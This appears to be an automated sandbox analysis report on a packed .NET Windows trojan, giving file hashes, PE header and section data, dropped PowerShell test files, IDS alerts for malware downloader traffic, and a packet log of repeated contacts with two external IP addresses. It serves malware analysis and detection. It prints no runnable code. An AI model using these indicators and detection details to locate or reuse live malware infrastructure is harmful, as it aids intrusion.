                                              SHA-512:F9ED104279065F45CE0EEF584A4435C9B6B90F9DD6E1DE89D4EDB4F635E866A039969B3BDF112888312E3AABB91B2D73EF7CA3E8A7CB34A3CE042B6F1B3090AC
                                              Malicious:false
                                              Reputation:low
                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.83482913122869
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              File size:694'272 bytes
                                              MD5:48977f1b641a9a3d88329ac470152381
                                              SHA1:d0eb9734f9bdeb6ab50ccad4342f92f4d405d2f0
                                              SHA256:1c829d80809fb2b5f7c2b40cf05064765bf237f655c9ca557e2d5a01f52b4bc6
                                              SHA512:8f0e68b0b489a5aeb363641dc85408e8358a2fbd822d62cf494ce670294fe8f84d8c0ae2baa6e80c3099b3e37a8b35501b87eac88235e52c935908a0d565975b
                                              SSDEEP:12288:QkJZPIBQBNWZEV6fewCe5wHdiFNCghayBN9YlXOx5eh8bQb:Q5iNiEVkAe5wMFNChly5BI
                                              TLSH:98E402542126D61AC0A21BF109A3C1F817BA5DCC7922C28BDFEABEEF7C767511940793
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#...............0.................. ........@.. ....................................@................................
                                              Icon Hash:00928e8e8686b000
                                              Entrypoint:0x4aaa96
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xF223B00A [Wed Sep 24 19:24:58 2098 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xaaa410x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x620.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xa983c0x70.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xa8a9c0xa8c005c07fe91fd4c98df52bd2358e77555aaFalse0.933125data7.84421246743167IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xac0000x6200x800e43963b5dbdc8fdee2bf00f0e84ba9b5False0.33642578125data3.4494508521173253IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xae0000xc0x20069dea81a779859ca4eb95a1fa720d7e9False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0xac0900x390data0.4243421052631579
                                              RT_MANIFEST0xac4300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                              DLLImport
                                              mscoree.dll_CorExeMain
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-25T21:54:21.022131+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749703193.122.6.16880TCP
                                              2024-09-25T21:54:22.069011+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749703193.122.6.16880TCP
                                              2024-09-25T21:54:22.614687+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749706188.114.97.3443TCP
                                              2024-09-25T21:54:23.553376+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749708193.122.6.16880TCP
                                              2024-09-25T21:54:25.392729+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749712188.114.97.3443TCP
                                              2024-09-25T21:54:28.112281+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749716188.114.97.3443TCP
                                              2024-09-25T21:54:31.873030+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749722188.114.97.3443TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 25, 2024 21:54:19.811009884 CEST4970380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:19.816009045 CEST8049703193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:19.816071987 CEST4970380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:19.816318035 CEST4970380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:19.821110964 CEST8049703193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:20.751400948 CEST8049703193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:20.755733967 CEST4970380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:20.760699034 CEST8049703193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:20.968812943 CEST8049703193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:21.021539927 CEST49705443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:21.021583080 CEST44349705188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:21.021703005 CEST49705443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:21.022130966 CEST4970380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:21.028439045 CEST49705443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:21.028460026 CEST44349705188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:21.538511992 CEST44349705188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:21.538680077 CEST49705443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:21.543659925 CEST49705443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:21.543672085 CEST44349705188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:21.544073105 CEST44349705188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:21.585308075 CEST49705443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:21.602082968 CEST49705443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:21.647397995 CEST44349705188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:21.719832897 CEST44349705188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:21.719940901 CEST44349705188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:21.720073938 CEST49705443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:21.726128101 CEST49705443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:21.729464054 CEST4970380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:21.734375000 CEST8049703193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:22.004311085 CEST8049703193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:22.006670952 CEST49706443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:22.006711006 CEST44349706188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:22.006792068 CEST49706443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:22.007376909 CEST49706443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:22.007395029 CEST44349706188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:22.069010973 CEST4970380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:22.483731031 CEST44349706188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:22.493709087 CEST49706443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:22.493725061 CEST44349706188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:22.614721060 CEST44349706188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:22.614907026 CEST44349706188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:22.614978075 CEST49706443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:22.615303993 CEST49706443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:22.618825912 CEST4970380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:22.620014906 CEST4970880192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:22.625222921 CEST8049703193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:22.625276089 CEST4970380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:22.625941038 CEST8049708193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:22.626010895 CEST4970880192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:22.626214981 CEST4970880192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:22.631875992 CEST8049708193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:23.499480963 CEST8049708193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:23.500583887 CEST49709443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:23.500623941 CEST44349709188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:23.500709057 CEST49709443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:23.500936031 CEST49709443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:23.500952959 CEST44349709188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:23.553375959 CEST4970880192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:23.975265026 CEST44349709188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:23.976898909 CEST49709443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:23.976927996 CEST44349709188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:24.130088091 CEST44349709188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:24.130173922 CEST44349709188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:24.130445004 CEST49709443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:24.130703926 CEST49709443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:24.135467052 CEST4971180192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:24.140453100 CEST8049711193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:24.140547037 CEST4971180192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:24.140626907 CEST4971180192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:24.146189928 CEST8049711193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:24.776884079 CEST8049711193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:24.786533117 CEST49712443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:24.786578894 CEST44349712188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:24.786684036 CEST49712443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:24.787127018 CEST49712443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:24.787138939 CEST44349712188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:24.834651947 CEST4971180192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:25.242976904 CEST44349712188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:25.244807005 CEST49712443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:25.244827986 CEST44349712188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:25.392757893 CEST44349712188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:25.392873049 CEST44349712188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:25.392949104 CEST49712443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:25.393439054 CEST49712443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:25.397064924 CEST4971180192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:25.397897005 CEST4971380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:25.402817965 CEST8049713193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:25.402973890 CEST4971380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:25.403053045 CEST4971380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:25.408005953 CEST8049713193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:25.411324024 CEST8049711193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:25.411397934 CEST4971180192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:26.040602922 CEST8049713193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:26.041795969 CEST49714443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:26.041861057 CEST44349714188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:26.041939020 CEST49714443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:26.042184114 CEST49714443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:26.042207003 CEST44349714188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:26.084721088 CEST4971380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:26.518495083 CEST44349714188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:26.520159960 CEST49714443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:26.520196915 CEST44349714188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:26.664233923 CEST44349714188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:26.664340973 CEST44349714188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:26.664410114 CEST49714443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:26.664952040 CEST49714443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:26.668107033 CEST4971380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:26.668821096 CEST4971580192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:26.673384905 CEST8049713193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:26.673518896 CEST4971380192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:26.673898935 CEST8049715193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:26.673988104 CEST4971580192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:26.674101114 CEST4971580192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:26.678952932 CEST8049715193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:27.474567890 CEST8049715193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:27.475986004 CEST49716443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:27.476046085 CEST44349716188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:27.476111889 CEST49716443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:27.476344109 CEST49716443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:27.476356030 CEST44349716188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:27.521532059 CEST4971580192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:27.954691887 CEST44349716188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:27.956971884 CEST49716443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:27.957000017 CEST44349716188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:28.112307072 CEST44349716188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:28.112406969 CEST44349716188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:28.112514973 CEST49716443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:28.113224030 CEST49716443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:28.116915941 CEST4971580192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:28.118225098 CEST4971780192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:28.124094963 CEST8049715193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:28.124174118 CEST4971580192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:28.125006914 CEST8049717193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:28.125089884 CEST4971780192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:28.125169039 CEST4971780192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:28.131098032 CEST8049717193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:28.756685972 CEST8049717193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:28.758390903 CEST49718443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:28.758467913 CEST44349718188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:28.758544922 CEST49718443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:28.758865118 CEST49718443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:28.758882999 CEST44349718188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:28.803415060 CEST4971780192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:29.216527939 CEST44349718188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:29.226427078 CEST49718443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:29.226474047 CEST44349718188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:29.345521927 CEST44349718188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:29.345639944 CEST44349718188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:29.345793009 CEST49718443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:29.346467018 CEST49718443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:29.350182056 CEST4971780192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:29.351500988 CEST4971980192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:29.355263948 CEST8049717193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:29.355345011 CEST4971780192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:29.356337070 CEST8049719193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:29.356426001 CEST4971980192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:29.356527090 CEST4971980192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:29.361352921 CEST8049719193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:30.004937887 CEST8049719193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:30.006433964 CEST49720443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:30.006488085 CEST44349720188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:30.006571054 CEST49720443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:30.006917953 CEST49720443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:30.006932020 CEST44349720188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:30.053402901 CEST4971980192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:30.466841936 CEST44349720188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:30.468799114 CEST49720443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:30.468859911 CEST44349720188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:30.600327015 CEST44349720188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:30.600426912 CEST44349720188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:30.600497007 CEST49720443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:30.601066113 CEST49720443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:30.603840113 CEST4971980192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:30.604882002 CEST4972180192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:30.609066963 CEST8049719193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:30.609162092 CEST4971980192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:30.609776974 CEST8049721193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:30.609860897 CEST4972180192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:30.609955072 CEST4972180192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:30.614748001 CEST8049721193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:31.239100933 CEST8049721193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:31.240577936 CEST49722443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:31.240632057 CEST44349722188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:31.240714073 CEST49722443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:31.241125107 CEST49722443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:31.241142988 CEST44349722188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:31.287811995 CEST4972180192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:31.697062016 CEST44349722188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:31.713974953 CEST49722443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:31.713994026 CEST44349722188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:31.873064041 CEST44349722188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:31.873205900 CEST44349722188.114.97.3192.168.2.7
                                              Sep 25, 2024 21:54:31.873297930 CEST49722443192.168.2.7188.114.97.3
                                              Sep 25, 2024 21:54:31.873867035 CEST49722443192.168.2.7188.114.97.3
